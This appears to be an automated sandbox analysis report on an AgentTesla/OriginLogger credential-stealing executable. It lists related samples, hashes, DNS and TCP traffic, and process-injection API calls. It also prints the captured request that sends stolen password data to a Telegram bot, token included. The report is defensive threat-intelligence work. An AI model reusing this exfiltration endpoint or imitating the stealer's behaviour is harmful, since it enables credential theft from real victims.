                                                                                              • 149.154.167.220
                                                                                              PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 149.154.167.220
                                                                                              FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                              • 149.154.167.220
                                                                                              doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 149.154.167.220
                                                                                              2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              DHL_Original_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              Inv-67383728 [Reference Nr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TELEGRAMRUsetup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 149.154.167.220

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0ePayment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              setup.exeGet hashmaliciousXmrigBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              Payment Invoice 0012657.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155
                                                                                              yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              • 64.185.227.155

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g0PWOnCNZH.exe.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1216
                                                                                              Entropy (8bit):5.355304211458859
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                              Malicious:true
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:
                                                                                              Entropy (8bit):7.86252276593653
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:g0PWOnCNZH.exe
                                                                                              File size:746496
                                                                                              MD5:87be1ac6122ed0c75b3af80696b9e686
                                                                                              SHA1:28954d7b81380a52dc012eb21c4769fe54070a5c
                                                                                              SHA256:de673c6577604d1036c5df6d67d9f5f9010eeb367a43ec7712b5614f70b725cd
                                                                                              SHA512:a58b7039d2967f214534f0609e9e2fa16b0ae2520265bac212cfd8a2d3a908276b1ef54bd8536028ddd1614eafd686d9effdd7d7a3472845c668c1cb1bc7f947
                                                                                              SSDEEP:12288:r9umYMUnFW/Nhb/kpGsc1WgkAhK6KttQM2AW+DYXoRf0D9u1pHG8RTiy4uhyNv6n:r9uUT2wogkAg6K7Q4pMXomwRhhyNv6
                                                                                              TLSH:76F402782F8A9538F1321BBD85E8264467AEB3B26713D55D18F511CE4B63B034ED0A2F
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;..d..............0..N..........fm... ........@.. ....................................@................................

                                                                                              File Icon

                                                                                              Icon Hash:209480e66eb84902

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.2.3149.154.167.220496854432851779 03/20/23-16:41:25.765012TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49685443192.168.2.3149.154.167.220

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Mar 20, 2023 16:41:11.823951960 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:11.824016094 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:11.824614048 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:11.861870050 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:11.861911058 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:13.289160013 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:13.289249897 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:13.293323994 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:13.293349981 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:13.293910980 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:13.336273909 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:13.603498936 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:13.603526115 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:13.702334881 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:13.703789949 CET4434968464.185.227.155192.168.2.3
                                                                                              Mar 20, 2023 16:41:13.703888893 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:13.705327988 CET49684443192.168.2.364.185.227.155
                                                                                              Mar 20, 2023 16:41:25.648309946 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.648375988 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.648475885 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.649236917 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.649266005 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.715833902 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.715944052 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.718837976 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.718869925 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.719206095 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.721429110 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.721477032 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.762315035 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.764890909 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.764924049 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.857546091 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.857656956 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.858115911 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.858155012 CET49685443192.168.2.3149.154.167.220
                                                                                              Mar 20, 2023 16:41:25.858175039 CET44349685149.154.167.220192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.858217001 CET49685443192.168.2.3149.154.167.220

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Mar 20, 2023 16:41:11.759686947 CET5897453192.168.2.38.8.8.8
                                                                                              Mar 20, 2023 16:41:11.779360056 CET53589748.8.8.8192.168.2.3
                                                                                              Mar 20, 2023 16:41:11.789952040 CET6372253192.168.2.38.8.8.8
                                                                                              Mar 20, 2023 16:41:11.807668924 CET53637228.8.8.8192.168.2.3
                                                                                              Mar 20, 2023 16:41:25.629864931 CET6552253192.168.2.38.8.8.8
                                                                                              Mar 20, 2023 16:41:25.647144079 CET53655228.8.8.8192.168.2.3

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Mar 20, 2023 16:41:11.759686947 CET192.168.2.38.8.8.80x745eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.789952040 CET192.168.2.38.8.8.80xb647Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:25.629864931 CET192.168.2.38.8.8.80x9cefStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                              Mar 20, 2023 16:41:25.647144079 CET8.8.8.8192.168.2.30x9cefNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • api.ipify.org
                                                                                              • api.telegram.org

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.34968464.185.227.155443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-03-20 15:41:13 UTC0OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                              Host: api.ipify.org
                                                                                              Connection: Keep-Alive
                                                                                              2023-03-20 15:41:13 UTC0INHTTP/1.1 200 OK
                                                                                              Content-Length: 14
                                                                                              Content-Type: text/plain
                                                                                              Date: Mon, 20 Mar 2023 15:41:13 GMT
                                                                                              Vary: Origin
                                                                                              Connection: close
                                                                                              2023-03-20 15:41:13 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                              Data Ascii: 102.129.143.78


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.349685149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-03-20 15:41:25 UTC0OUTPOST /bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=---------------------------8db2961f20f6dfc
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 972
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              2023-03-20 15:41:25 UTC0INHTTP/1.1 100 Continue
                                                                                              2023-03-20 15:41:25 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 36 31 66 32 30 66 36 64 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 39 35 31 38 35 38 39 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 36 31 66 32 30 66 36 64 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 31 36 3a 34 31 3a 32 35 0a 55 73 65 72
                                                                                              Data Ascii: -----------------------------8db2961f20f6dfcContent-Disposition: form-data; name="chat_id"1295185895-----------------------------8db2961f20f6dfcContent-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 16:41:25User
                                                                                              2023-03-20 15:41:25 UTC1INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Mon, 20 Mar 2023 15:41:25 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 762
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              {"ok":true,"result":{"message_id":38460,"from":{"id":2134979594,"is_bot":true,"first_name":"ORIGINLOGGER","username":"ORINGINLOGGERgibBOT"},"chat":{"id":1295185895,"first_name":"Gibson","last_name":"Marty","username":"gibmann","type":"private"},"date":1679326885,"document":{"file_name":"user-932923 2023-03-20 16-41-25.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAKWPGQYfqUPBi8UE3EHAAHfNT9QNtm4igACCQ4AAt12wVDfIEg4lrpSji8E","file_unique_id":"AgADCQ4AAt12wVA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 16:41:25\nUser Name: user/932923\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:16:41:00
                                                                                              Start date:20/03/2023
                                                                                              Path:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                                                              Imagebase:0x990000
                                                                                              File size:746496 bytes
                                                                                              MD5 hash:87BE1AC6122ED0C75B3AF80696B9E686
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:16:41:09
                                                                                              Start date:20/03/2023
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Imagebase:0x570000
                                                                                              File size:45152 bytes
                                                                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:9.9%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:128
                                                                                                Total number of Limit Nodes:4
                                                                                                execution_graph 17089 7b78ce0 17090 7b78e6b 17089->17090 17091 7b78d06 17089->17091 17091->17090 17093 7b78f60 PostMessageW 17091->17093 17094 7b78fcc 17093->17094 17094->17091 17095 73f84a8 17096 73f84f0 WriteProcessMemory 17095->17096 17098 73f8547 17096->17098 17232 73f85c8 17233 73f8613 ReadProcessMemory 17232->17233 17235 73f8657 17233->17235 17087 14fc940 DuplicateHandle 17088 14fc9d6 17087->17088 17099 14fc310 GetCurrentProcess 17100 14fc38a GetCurrentThread 17099->17100 17101 14fc383 17099->17101 17102 14fc3c7 GetCurrentProcess 17100->17102 17103 14fc3c0 17100->17103 17101->17100 17106 14fc3fd 17102->17106 17103->17102 17104 14fc425 GetCurrentThreadId 17105 14fc456 17104->17105 17106->17104 17107 14f40d0 17108 14f40e2 17107->17108 17109 14f40ee 17108->17109 17113 14f41e0 17108->17113 17118 14f3c64 17109->17118 17111 14f410d 17114 14f4205 17113->17114 17122 14f42d0 17114->17122 17126 14f42e0 17114->17126 17119 14f3c6f 17118->17119 17134 14f51a4 17119->17134 17121 14f7241 17121->17111 17124 14f42da 17122->17124 17123 14f43e4 17123->17123 17124->17123 17130 14f3de8 17124->17130 17128 14f4307 17126->17128 17127 14f43e4 17127->17127 17128->17127 17129 14f3de8 CreateActCtxA 17128->17129 17129->17127 17131 14f5370 CreateActCtxA 17130->17131 17133 14f5433 17131->17133 17135 14f51af 17134->17135 17138 14f6dc0 17135->17138 17137 14f784d 17137->17121 17139 14f6dcb 17138->17139 17142 14f6df0 17139->17142 17141 14f7922 17141->17137 17143 14f6dfb 17142->17143 17146 14f6e20 17143->17146 17145 14f7a22 17145->17141 17147 14f6e2b 17146->17147 17149 14f813e 17147->17149 17152 14f9ef8 17147->17152 17148 14f817c 17148->17145 17149->17148 17157 14fc038 17149->17157 17153 14f9efd 17152->17153 17162 14f9f20 17153->17162 17166 14f9f30 17153->17166 17154 14f9f0e 17154->17149 17158 14fc069 17157->17158 17159 14fc08d 17158->17159 17189 14fc1e8 17158->17189 17193 14fc1f8 17158->17193 17159->17148 17163 14f9f30 17162->17163 17169 14fa028 17163->17169 17164 14f9f3f 17164->17154 17168 14fa028 2 API calls 17166->17168 17167 14f9f3f 17167->17154 17168->17167 17170 14fa03b 17169->17170 17172 14fa053 17170->17172 17177 14fa2a0 17170->17177 17181 14fa2b0 17170->17181 17171 14fa04b 17171->17172 17173 14fa250 GetModuleHandleW 17171->17173 17172->17164 17174 14fa27d 17173->17174 17174->17164 17179 14fa2b0 17177->17179 17178 14fa2e9 17178->17171 17179->17178 17185 14f93d8 17179->17185 17182 14fa2c4 17181->17182 17183 14fa2e9 17182->17183 17184 14f93d8 LoadLibraryExW 17182->17184 17183->17171 17184->17183 17186 14fa490 LoadLibraryExW 17185->17186 17188 14fa509 17186->17188 17188->17178 17190 14fc1f8 17189->17190 17191 14fc23f 17190->17191 17197 14fa9c4 17190->17197 17191->17159 17194 14fc205 17193->17194 17195 14fa9c4 2 API calls 17194->17195 17196 14fc23f 17194->17196 17195->17196 17196->17159 17198 14fa9cf 17197->17198 17200 14fcf38 17198->17200 17201 14fc574 17198->17201 17200->17200 17202 14fc57f 17201->17202 17203 14f6e20 2 API calls 17202->17203 17204 14fcfa7 17203->17204 17208 14fed30 17204->17208 17216 14fed18 17204->17216 17205 14fcfe0 17205->17200 17209 14fed54 17208->17209 17210 14fed9f 17209->17210 17211 14fed6d 17209->17211 17212 14fed18 LoadLibraryExW GetModuleHandleW 17209->17212 17213 14fed30 LoadLibraryExW GetModuleHandleW 17209->17213 17214 14ff19f LoadLibraryExW GetModuleHandleW 17210->17214 17215 14ff1b0 LoadLibraryExW GetModuleHandleW 17210->17215 17211->17205 17212->17210 17213->17210 17214->17211 17215->17211 17218 14fed23 17216->17218 17217 14fed6d 17217->17205 17218->17217 17219 14fed9f 17218->17219 17220 14fed18 LoadLibraryExW GetModuleHandleW 17218->17220 17221 14fed30 LoadLibraryExW GetModuleHandleW 17218->17221 17222 14ff19f LoadLibraryExW GetModuleHandleW 17219->17222 17223 14ff1b0 LoadLibraryExW GetModuleHandleW 17219->17223 17220->17219 17221->17219 17222->17217 17223->17217 17224 7b78c98 17225 7b78cad 17224->17225 17228 73f8220 17225->17228 17229 73f8265 SetThreadContext 17228->17229 17231 73f82ad 17229->17231 17236 73f8140 17237 73f8180 ResumeThread 17236->17237 17239 73f81b1 17237->17239 17240 